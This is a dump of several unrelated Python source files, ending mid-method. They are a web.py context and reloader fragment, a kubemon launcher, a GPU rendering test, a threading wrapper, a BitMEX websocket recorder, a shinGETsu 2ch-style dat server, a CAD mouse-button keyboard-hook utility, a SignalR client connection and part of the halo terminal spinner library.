class Reloader:
"""
Before every request, checks to see if any loaded modules have changed on
disk and, if so, reloads them.
"""
def __init__(self, func):
self.func = func
self.mtimes = {}
global _compiletemplate
b = _compiletemplate.bases
_compiletemplate = globals()['__compiletemplate']
_compiletemplate.bases = b
def check(self):
for mod in sys.modules.values():
try:
mtime = os.stat(mod.__file__).st_mtime
except (AttributeError, OSError, IOError):
continue
if mod.__file__.endswith('.pyc') and \
os.path.exists(mod.__file__[:-1]):
mtime = max(os.stat(mod.__file__[:-1]).st_mtime, mtime)
if mod not in self.mtimes:
self.mtimes[mod] = mtime
elif self.mtimes[mod] < mtime:
try:
reload(mod)
except ImportError:
pass
return True
def __call__(self, e, o):
self.check()
return self.func(e, o)
reloader = Reloader
def profiler(app):
"""Outputs basic profiling information at the bottom of each response."""
def profile_internal(e, o):
out, result = profile(app)(e, o)
return out + ['<pre>' + result + '</pre>'] #@@encode
return profile_internal
## Context
class _outputter:
"""Wraps `sys.stdout` so that print statements go into the response."""
def write(self, string_):
if hasattr(ctx, 'output'):
return output(string_)
else:
_oldstdout.write(string_)
def flush(self):
return _oldstdout.flush()
def close(self):
return _oldstdout.close()
_context = {currentThread():Storage()}
ctx = context = threadeddict(_context)
ctx.__doc__ = """
A `storage` object containing various information about the request:
`environ` (aka `env`)
: A dictionary containing the standard WSGI environment variables.
`host`
: The domain (`Host` header) requested by the user.
`home`
: The base path for the application.
`ip`
: The IP address of the requester.
`method`
: The HTTP method used.
`path`
: The path request.
`fullpath`
: The full path requested, including query arguments.
### Response Data
`status` (default: "200 OK")
: The status code to be used in the response.
`headers`
: A list of 2-tuples to be used in the response.
`output`
: A string to be used as the response.
"""
if not '_oldstdout' in globals():
_oldstdout = sys.stdout
sys.stdout = _outputter()
loadhooks = {}
def load():
"""
Loads a new context for the thread.
You can ask for a function to be run at loadtime by
adding it to the dictionary `loadhooks`.
"""
_context[currentThread()] = Storage()
ctx.status = '200 OK'
ctx.headers = []
if 'db_parameters' in globals():
connect(**db_parameters)
for x in loadhooks.values(): x()
def _load(env):
load()
ctx.output = ''
ctx.environ = ctx.env = env
ctx.host = env.get('HTTP_HOST')
ctx.home = 'http://' + env.get('HTTP_HOST', '[unknown]') + \
os.environ.get('REAL_SCRIPT_NAME', env.get('SCRIPT_NAME', ''))
ctx.ip = env.get('REMOTE_ADDR')
ctx.method = env.get('REQUEST_METHOD')
ctx.path = env.get('PATH_INFO')
# http://trac.lighttpd.net/trac/ticket/406 requires:
if env.get('SERVER_SOFTWARE', '').startswith('lighttpd/'):
ctx.path = lstrips(env.get('REQUEST_URI').split('?')[0],
os.environ.get('REAL_SCRIPT_NAME', env.get('SCRIPT_NAME', '')))
ctx.fullpath = ctx.path
if env.get('QUERY_STRING'):
ctx.fullpath += '?' + env.get('QUERY_STRING', '')
unloadhooks = {}
def unload():
"""
Unloads the context for the thread.
    You can ask for a function to be run at unload time by
    adding it to the dictionary `unloadhooks`.
"""
for x in unloadhooks.values(): x()
# ensures db cursors and such are GCed promptly
del _context[currentThread()]
def _unload():
unload()
if __name__ == "__main__":
import doctest
doctest.testmod()
urls = ('/web.py', 'source')
class source:
def GET(self):
header('Content-Type', 'text/python')
print open(sys.argv[0]).read()
run(urls)
|
__main__.py
|
from kubemon.log import create_logger
from .exceptions.platform_exception import NotLinuxException
from .cli import *
from .merge import merge
from .collector.commands import COMMANDS
from multiprocessing import Process
import sys
import logging
def start(instance):
instance.start()
if __name__ == "__main__":
if 'win' in sys.platform:
raise NotLinuxException("Kubemon is only available for Linux-based Operating Systems. Sorry.")
LOGGER = create_logger(__name__, level=logging.DEBUG)
if args.type == 'merge':
if not args.files:
print("Merge type requires --file/-f")
else:
merge(*args.files)
if args.type in MODULES:
LOGGER.debug(f"Starting application {args.type}")
get_system(args.type, args).start()
if args.type == 'cli' and args.command:
LOGGER.debug("Executed CLI")
get_system(args.type, args).exec(args.command)
if args.type == 'all':
LOGGER.debug("Starting application with all monitors")
for s in MODULES[1:]:
s = get_system(s, args)
Process(target=start, args=(s,)).start()
if args.list:
print("Available modules:")
LOGGER.debug("Listing modules")
for module in MODULES:
print(f"\t- {module.capitalize()}")
if args.list_commands:
print("Available commands:")
LOGGER.debug("Listing commands")
for cmd in COMMANDS:
print(f"- {COMMANDS[cmd]}")
|
example2_test_white_percentage.py
|
#
# For this is how God loved the world:<br/>
# he gave his only Son, so that everyone<br/>
# who believes in him may not perish<br/>
# but may have eternal life.
#
# John 3:16
#
from aRibeiro.tools import SensorVis
import time
from threading import Thread
from multiprocessing import Value
import random
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 800
VIRTUAL_IMAGE_WIDTH = 1920
VIRTUAL_IMAGE_HEIGHT = 1080
VIRTUAL_IMAGE_LINE_WIDTH = 1.0
sensorVis = SensorVis(
WINDOW_WIDTH,WINDOW_HEIGHT,
VIRTUAL_IMAGE_WIDTH,VIRTUAL_IMAGE_HEIGHT,
VIRTUAL_IMAGE_LINE_WIDTH
)
terminateFlag = Value("i", 0)
def AnotherThreadLineDrawer(terminateFlag:Value, sensorVis:SensorVis):
while not terminateFlag.value:
random_start_sec = 0.03
random_end_sec = 0.07
time.sleep( random.random() * (random_end_sec-random_start_sec) + random_start_sec )
random_v_count = random.randint(10, 200)
sensorVis.virtual_image.clear([0,0,0,1])
for i in range(random_v_count):
v1 = [random.random()*sensorVis.map_width,random.random()*sensorVis.map_height,0]
v2 = [random.random()*sensorVis.map_width,random.random()*sensorVis.map_height,0]
sensorVis.virtual_image.lineRenderer.addLine(
v1, # vertex A
v2, # vertex B
[1,1,1,1], #color a
[1,1,1,1] #color b
)
# test query the white percent
gpu_start = time.time()
gpu_value = sensorVis.virtual_image.computeColorPercentage([1,1,1])
gpu_end = time.time()
print("GPU -> value:",gpu_value,"time:", gpu_end-gpu_start, "s")
thread = Thread( target=AnotherThreadLineDrawer, args=[terminateFlag, sensorVis] )
thread.start()
while not sensorVis.windowClosed():
sensorVis.update()
terminateFlag.value = 1
while thread.is_alive():
sensorVis.update()
print("window closed...")
print("gpu processing...")
gpu_start = time.time()
gpu_value = sensorVis.virtual_image.computeColorPercentage([1,1,1])
gpu_end = time.time()
print("GPU -> value:",gpu_value,"time:", gpu_end-gpu_start, "s")
print("cpu processing...")
cpu_start = time.time()
rgb = sensorVis.virtual_image.readImageRGB()
count = 0
for col in rgb:
for row in col:
if row[0] > 200:
count += 1
cpu_value = count/(VIRTUAL_IMAGE_WIDTH*VIRTUAL_IMAGE_HEIGHT)
cpu_end = time.time()
print("CPU -> value:",cpu_value,"time:", cpu_end-cpu_start, "s")
sensorVis.finish()
thread.join()
|
onethreadnode.py
|
# Copyright © 2018 CNRS
# All rights reserved.
# @author Christophe Reymann
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function, division, absolute_import
from threading import Thread, Event
class OneThreadNode():
def __init__(self, node, *args, **kwargs):
self.node = node
#import needed node setup methods
self.send = self.node.send
self.send_callback = self.node.send_callback
self.push_callback = self.node.push_callback
self.time_callback = self.node.time_callback
self.setup_inflow = self.node.setup_inflow
self.setup_outflow = self.node.setup_outflow
self.setup_sink = self.node.setup_sink
self.stop_event = Event()
self.worker = Thread(name=self.name, target=self, daemon=True)
if "callback" in kwargs:
cb = kwargs["callback"]
self.process = cb
if "init" in kwargs:
init = kwargs["init"]
self.init = init
@property
def name(self):
return self.node.name
@property
def dt(self):
return self.node.dt
@property
def time(self):
return self.node.time
def start(self):
self.worker.start()
def stop(self):
self.stop_event.set()
def join(self, timeout=0):
return self.worker.join(timeout)
def isAlive(self):
        return self.worker.is_alive()
def __call__(self):
self.node.init()
self.init()
while not self.stop_event.is_set():
t = self.node.next()
if t is not None:
self.node.step(t)
def init(self):
        raise NotImplementedError("Please implement an init method in your subclass or pass init= to the constructor")
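if __name__ == "__main__":
    # Minimal usage sketch (an assumption, not part of the original module).
    # OneThreadNode expects a node object exposing the methods referenced in
    # __init__ plus init()/next()/step(); _FakeNode below is hypothetical and
    # only illustrates that interface.
    import time as _time

    class _FakeNode(object):
        name = "fake"
        dt = 0.1
        time = 0.0

        def _noop(self, *args, **kwargs):
            pass
        send = send_callback = push_callback = time_callback = _noop
        setup_inflow = setup_outflow = setup_sink = _noop

        def init(self):
            print("node init")

        def next(self):
            # pretend to wait for the next sample
            _time.sleep(self.dt)
            return self.time

        def step(self, t):
            print("step at", t)

    wrapped = OneThreadNode(_FakeNode(), init=lambda: print("user init"))
    wrapped.start()
    _time.sleep(0.35)
    wrapped.stop()
    wrapped.join(1)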
|
tradestream_110720.py
|
import datetime
import json
import os
import threading
import traceback
import time
import loghandler
from pymongo import MongoClient
import websocket
import subprocess
# from pprint import pprint
from google.cloud import translate_v2
import six
from dotenv import load_dotenv
load_dotenv(os.path.join(os.getcwd(), ".env"))
class ChatTranslator:
def __init__(self):
self.translate_client = translate_v2.Client()
def translate(self, text, target_language="en"):
pass
class BitmexStream:
def __init__(
self,
mongo_host="localhost",
mongo_port=27017,
mongo_db="bitmex",
translate_chat=True,
):
log_handler = loghandler.LogHandler()
self.logger = log_handler.create_logger("bitmexstream")
self.db = MongoClient(host=mongo_host, port=mongo_port)[mongo_db]
if translate_chat:
self.ct = ChatTranslator()
self.exited = False
def connect(self):
"""Connect to the websocket in a thread."""
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(
"wss://www.bitmex.com/realtime",
on_message=self.on_message,
on_close=self.on_close,
on_open=self.on_open,
on_error=self.on_error,
)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread.")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
time.sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to websocket! Exiting.")
self.exit()
raise websocket.WebSocketTimeoutException(
"Couldn't connect to websocket! Exiting."
)
def subscribe(self, channels):
self.send_command(command="subscribe", args=channels)
def unsubscribe(self, channels):
self.send_command(command="unsubscribe", args=channels)
def send_command(self, command, args=None):
"""Send a raw command."""
if args is None:
args = []
self.ws.send(json.dumps({"op": command, "args": args}))
def on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
# pprint(message)
if message["table"] == "chat":
dt_name = "date"
else:
dt_name = "timestamp"
try:
if "data" in message and message["data"]: # and message["data"]:
for idx, single_trade in enumerate(message["data"]):
message["data"][idx][dt_name] = datetime.datetime.fromisoformat(
single_trade[dt_name].rstrip("Z")
)
if message["table"] == "chat":
self.logger.debug(
f"Chat Message: {message['data'][0]['user']} => {message['data'][0]['message']}"
)
else:
# insert_result = self.db[message["data"][0]["symbol"]].insert_many(
# message["data"]
# )
insert_result = self.db[message["table"]].insert_many(
message["data"]
)
if message["table"] == "trade":
self.logger.debug(
f"Trade Count: {len(insert_result.inserted_ids)}, {message['data'][0]['symbol']} => {message['data'][0]['side'].upper()} {message['data'][0]['size']} @ {message['data'][0]['price']}"
)
elif message["table"] == "instrument":
self.logger.debug(
f"Table: {message['table']}, {message['data'][0]['symbol']}"
)
else:
if dt_name in message:
message[dt_name] = datetime.datetime.fromisoformat(
message[dt_name].rstrip("Z")
)
insert_result = self.db["status"].insert_one(message)
self.logger.debug(f"Status ID: {insert_result.inserted_id}")
except:
self.logger.error(traceback.format_exc())
def chat_handler(self, message):
pass
def on_error(self, error):
"""Called on fatal websocket errors. We exit on these."""
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
def on_open(self):
"""Called when the WS opens."""
self.logger.debug("Websocket opened.")
def on_close(self):
"""Called on websocket close."""
self.logger.info("Websocket closed.")
def exit(self):
"""Call this to exit - will close websocket."""
self.ws.close()
self.exited = True
if __name__ == "__main__":
bitmex_stream = BitmexStream()
bitmex_stream.connect()
bitmex_stream.subscribe(
[
"trade:XBTUSD",
"instrument:XBTUSD",
"trade:ETHUSD",
"instrument:ETHUSD",
"chat",
]
)
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
bitmex_stream.logger.info("Exit signal received.")
bitmex_stream.exit()
break
except Exception as e:
bitmex_stream.logger.exception(e)
time.sleep(5)
|
datd.py
|
"""2ch like dat interface
"""
#
# Copyright (c) 2014,2015 shinGETsu Project.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
from wsgiref import simple_server
import threading
import re
from wsgiref.headers import Headers
from email import utils as eutils
import collections
import socketserver
from shingetsu import cache
from shingetsu import title
from shingetsu import config
from shingetsu import gateway
from shingetsu import tag
from . import post
from . import middleware
from . import dat
from . import utils
from . import keylib
board_re = re.compile(r'/([^/]+)/$')
thread_re = re.compile(r'/([^/]+)/dat/([^.]+)\.dat')
subject_re = re.compile(r'/([^/]+)/subject\.txt')
post_comment_re = re.compile(r'/test/bbs\.cgi')
head_re = re.compile(r'/([^/]+)/head\.txt$')
@middleware.simple_range
@middleware.last_modified
@middleware.gzipped
def dat_app(env, resp):
# utils.log('dat_app')
addr = env.get('REMOTE_ADDR', '')
env['shingetsu.isadmin'] = bool(config.re_admin.match(addr))
env['shingetsu.isfriend'] = bool(config.re_friend.match(addr))
env['shingetsu.isvisitor'] = bool(config.re_visitor.match(addr))
isopen = (env['shingetsu.isadmin'] or env['shingetsu.isfriend']
or env['shingetsu.isvisitor'])
utils.log_request(env)
path = env.get('PATH_INFO', '')
if not isopen:
resp('403 Forbidden', [('Content-Type', 'text/plain')])
return [b'403 Forbidden']
routes = [
(board_re, board_app),
(subject_re, subject_app),
(thread_re, thread_app),
(post_comment_re, post.post_comment_app),
(head_re, head_app)
]
try:
for (route, app) in routes:
m = route.match(path)
if m:
env['mch.path_match'] = m
return app(env, resp)
except keylib.DatkeyNotFound:
pass
resp("404 Not Found", [('Content-Type', 'text/plain')])
return [b'404 Not Found']
def check_get_cache(env):
if not (env['shingetsu.isfriend'] or env['shingetsu.isadmin']):
return False
agent = env.get("HTTP_USER_AGENT", "")
if re.search(config.robot, agent):
return False
return True
_lock = threading.Lock()
_update_counter = collections.defaultdict(int)
_UPDATE_COUNT = 4 # once every _UPDATE_COUNT times
def _count_is_update(thread_key):
with _lock:
try:
_update_counter[thread_key] += 1
return _update_counter[thread_key] == _UPDATE_COUNT
finally:
_update_counter[thread_key] %= _UPDATE_COUNT
def board_app(env, resp):
path = env['PATH_INFO']
m = board_re.match(path)
board = m.group(1)
message = gateway.search_message(env.get('HTTP_ACCEPT_LANGUAGE', 'ja'))
headers = Headers([('Content-Type', 'text/html; charset=Shift_JIS')])
resp("200 OK", headers.items())
board = utils.sanitize(utils.get_board(path))
if board:
fmt = '{logo} - {board} - {desc}'
else:
fmt = '{logo} - {desc}'
text = fmt.format(logo=message['logo'], desc=message['description'], board=board)
html = '''
<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=Shift_JIS">
<title>{text}</title>
<meta name="description" content="{text}">
</head><body>
<h1>{text}</h1>
</body></html>
'''.format(text=text)
return [html.encode('cp932', 'replace')]
def thread_app(env, resp):
path = env['PATH_INFO']
# utils.log('thread_app', path)
m = thread_re.match(path)
board, datkey = m.group(1), m.group(2)
key = keylib.get_filekey(datkey)
data = cache.Cache(key)
data.load()
if check_get_cache(env):
if not data.exists() or len(data) == 0:
# when first access, load data from network
data.search()
elif _count_is_update(key):
# update thread
# limit `data.search` calling. it's slow!
threading.Thread(target=data.search, daemon=True).start()
if not data.exists():
resp('404 Not Found', [('Content-Type', 'text/plain; charset=Shift_JIS')])
return [b'404 Not Found']
thread = dat.make_dat(data, env, board)
headers = Headers([('Content-Type', 'text/plain; charset=Shift_JIS')])
last_m = eutils.formatdate(data.stamp)
headers['Last-Modified'] = last_m
resp("200 OK", headers.items())
return (c.encode('cp932', 'replace') for c in thread)
def make_subject_cachelist(board):
"""Make RecentList&CacheList"""
recentlist = cache.RecentList()
cachelist = cache.CacheList()
seen = set(c.datfile for c in cachelist)
result = cachelist
for rec in recentlist:
if rec.datfile not in seen:
seen.add(rec.datfile)
c = cache.Cache(rec.datfile)
c.recent_stamp = rec.stamp
result.append(c)
result = [c for c in result if c.type == 'thread']
# same as order recent page
result.sort(key=lambda c: c.recent_stamp, reverse=True)
if board is not None:
sugtags = tag.SuggestedTagTable()
result = [c for c in result if has_tag(c, board, sugtags)]
return result
def subject_app(env, resp):
# utils.log('subject_app')
path = env['PATH_INFO']
# board is `title.file_encode`ed
# example: 2ch_E99B91E8AB87(雑談)
board = env['mch.path_match'].group(1)
    m = re.match(r'2ch_(\S+)', board)
if not (board.startswith('2ch') or m):
resp("404 Not Found", [('Content-Type', 'text/plain')])
return [b'404 Not Found']
board_encoded = m and title.str_decode(m.group(1))
if board_encoded:
# such as '雑談', 'ニュース', etc...
board_name = title.file_decode('dummy_' + board_encoded)
else:
board_name = None
subjects, last_stamp = make_subject(env, board_name)
resp('200 OK', [('Content-Type', 'text/plain; charset=Shift_JIS'),
('Last-Modified', eutils.formatdate(last_stamp))])
return (s.encode('cp932', 'replace') for s in subjects)
def make_subject(env, board):
load_from_net = check_get_cache(env)
subjects = []
cachelist = make_subject_cachelist(board)
last_stamp = 0
for c in cachelist:
if not load_from_net and len(c) == 0:
# Because you don't have a permission of getting data from network,
# don't need to look a thread that don't have records.
continue
if last_stamp < c.stamp:
last_stamp = c.stamp
try:
key = keylib.get_datkey(c.datfile)
except keylib.DatkeyNotFound:
continue
title_str = title.file_decode(c.datfile)
if title_str is not None:
title_str = title_str.replace('\n', '')
subjects.append('{key}.dat<>{title} ({num})\n'.format(
key=key,
title=title_str,
num=len(c)))
return subjects, last_stamp
def has_tag(c, board, sugtags):
tags = c.tags
if c.datfile in sugtags:
tags += sugtags[c.datfile]
return board in (str(t) for t in tags)
def head_app(env, resp):
resp('200 OK', [('Content-Type', 'text/plain; charset=Shift_JIS')])
body = []
with open(config.motd, encoding='utf-8', errors='replace') as f:
for line in f:
body.append(line.rstrip('\n') + '<br>\n')
return [''.join(body).encode('cp932', 'replace')]
class Datd(threading.Thread):
def __init__(self, *args, **kwds):
super(Datd, self).__init__(*args, **kwds)
self._port = config.dat_port
def run(self):
utils.log('start 2ch interface')
keylib.load()
try:
import waitress
except ImportError:
utils.log('use wsgiref')
class Server(socketserver.ThreadingMixIn,
simple_server.WSGIServer):
pass
_server = simple_server.make_server('', self._port, dat_app,
server_class=Server)
_server.serve_forever()
else:
utils.log('use waitress')
waitress.serve(dat_app, host='', port=self._port)
|
main.py
|
import pythoncom
import pyHook
import pyautogui
import win32ui
import threading
import time
import win32gui
import win32com.client
import sys
# pyHook must be manually added!
# https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook
# Download the file corresponding to the python version being used (I'm using 3.6.6)
# pip install
exit_prompt_given = False
middle_btn_state = False
l_ctrl_state = False
outside_key_count = 0
commonCADSoftware = ["solidedge", "solidworks", "autodeskautocad"]
def OnKeyboardEvent(event):
global exit_prompt_given
if exit_prompt_given or event.WindowName is None: # occurs when program is closing
return True
global outside_key_count
global l_ctrl_state
global middle_btn_state
# only work if common CAD software is being used.
identifier = event.WindowName.lower().replace(" ", "")
isCADWindow = False
for s in commonCADSoftware:
if identifier.startswith(s):
isCADWindow = True
break
# Oem_3 is the '`' key, or lowercase '~'. Key near top left of keyboard
if event.Key == "Oem_3":
new_state = event.MessageName == "key down"
if new_state != middle_btn_state:
# the button state has been toggled!
middle_btn_state = new_state
if middle_btn_state and l_ctrl_state:
# no need to release middle mouse button before exiting
# the program is being exited before the button is pressed down
exit_with_prompt("")
if isCADWindow:
# change middle mouse button state based on keyboard button state
if middle_btn_state:
pyautogui.mouseDown(button='middle')
else:
pyautogui.mouseUp(button='middle')
elif event.Key == "Lcontrol":
l_ctrl_state = event.MessageName == "key down"
if l_ctrl_state and middle_btn_state:
# release button before exiting.
pyautogui.mouseUp(button='middle')
exit_with_prompt("")
if not isCADWindow:
outside_key_count += 1
# increment key count if solid edge is not in focus
if outside_key_count >= 150:
exit_with_prompt("You may have accidentally forgotten that this program is running.\n")
    else:
outside_key_count = 0 # reset outside key count once CAD software is being used
return True
"""
In order:
-Makes all other key inputs ignored (by setting exit_prompt_given)
-Open dialog box in thread
-While thread is running, elevate the dialog
-Join. Wait for dialog to close
-Exit
"""
def exit_with_prompt(prefix):
global exit_prompt_given
exit_prompt_given = True
dialog_title = "Mouse Util"
t = threading.Thread(target=_message_thread, args=(dialog_title, prefix + "The program is exiting."))
t.start()
time.sleep(0.1)
win32gui.EnumWindows(_prompt_enum_handle, dialog_title)
t.join()
sys.exit()
# run within thread, because message box locks thread until it is closed
def _message_thread(title, text):
win32ui.MessageBox(text, title)
def _prompt_enum_handle(hwnd, title):
if win32gui.GetWindowText(hwnd) == title and win32gui.GetClassName(hwnd) == "#32770":
# https://stackoverflow.com/a/30314197/5458478
# ¯\_(ツ)_/¯
win32com.client.Dispatch("WScript.Shell").SendKeys('%')
win32gui.SetForegroundWindow(hwnd)
hm = pyHook.HookManager()
# get both key up and key down events
hm.KeyDown = OnKeyboardEvent
hm.KeyUp = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
|
_connection.py
|
import json
import sys
from threading import Thread
from signalr.events import EventHook
from signalr.hubs import Hub
from signalr.transports import AutoTransport
class Connection:
protocol_version = '1.5'
def __init__(self, url, session):
self.url = url
self.__hubs = {}
self.qs = {}
self.__send_counter = -1
self.token = None
self.id = None
self.data = None
self.received = EventHook()
self.error = EventHook()
self.starting = EventHook()
self.stopping = EventHook()
self.exception = EventHook()
self.is_open = False
self.__transport = AutoTransport(session, self)
self.__listener_thread = None
self.started = False
def handle_error(**kwargs):
error = kwargs["E"] if "E" in kwargs else None
if error is None:
return
self.error.fire(error)
self.received += handle_error
self.starting += self.__set_data
def __set_data(self):
self.data = json.dumps([{'name': hub_name} for hub_name in self.__hubs])
def increment_send_counter(self):
self.__send_counter += 1
return self.__send_counter
def start(self):
self.starting.fire()
negotiate_data = self.__transport.negotiate()
self.token = negotiate_data['ConnectionToken']
self.id = negotiate_data['ConnectionId']
listener = self.__transport.start()
def wrapped_listener():
while self.is_open:
try:
listener()
except:
self.exception.fire(*sys.exc_info())
self.is_open = False
self.is_open = True
self.__listener_thread = Thread(target=wrapped_listener)
self.__listener_thread.start()
self.started = True
def wait(self, timeout=30):
Thread.join(self.__listener_thread, timeout)
def send(self, data):
self.__transport.send(data)
def close(self):
self.is_open = False
self.__transport.close()
self.__listener_thread.join()
def register_hub(self, name):
if name not in self.__hubs:
if self.started:
raise RuntimeError(
'Cannot create new hub because connection is already started.')
self.__hubs[name] = Hub(name, self)
return self.__hubs[name]
def hub(self, name):
return self.__hubs[name]
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
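if __name__ == "__main__":
    # Minimal usage sketch (an assumption, not part of the original module).
    # The URL, hub name and method names below are placeholders, and the Hub
    # object returned by register_hub is assumed to expose the client.on /
    # server.invoke API of this package's Hub class.
    from requests import Session

    def print_message(*args, **kwargs):
        # generic handler; the real argument shape depends on the hub method
        print(args, kwargs)

    with Session() as session:
        connection = Connection("http://localhost:5000/signalr", session)
        chat = connection.register_hub("chat")  # register before start()
        connection.start()
        chat.client.on("newMessage", print_message)
        chat.server.invoke("Send", "hello from python")
        connection.wait(5)  # listen for a few seconds
        connection.close()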
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import unicode_literals, absolute_import
import sys
import threading
import time
import functools
import atexit
import cursor
from spinners.spinners import Spinners
from log_symbols.symbols import LogSymbols
from halo._utils import is_supported, colored_frame, is_text_type, decode_utf_8_text, get_terminal_columns, \
get_environment
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = '\033[K'
SPINNER_PLACEMENTS = ('left', 'right',)
def __init__(self, text='', color='cyan', spinner=None,
animation=None, placement='left', interval=-1, enabled=True, stream=sys.stdout):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
color : str, optional
Color of the text to display.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._interval = int(interval) if int(interval) > 0 else self._spinner['interval']
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self._enabled = enabled # Need to check for stream
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ('ipython', 'jupyter'):
from IPython import get_ipython
ip = get_ipython()
ip.events.register('post_run_cell', clean_up)
elif environment == 'terminal':
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner. For use in context managers.
Returns
-------
None
"""
return self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text['original']
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(placement, self.SPINNER_PLACEMENTS))
self._placement = placement
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text['original'])
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners['dots'].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
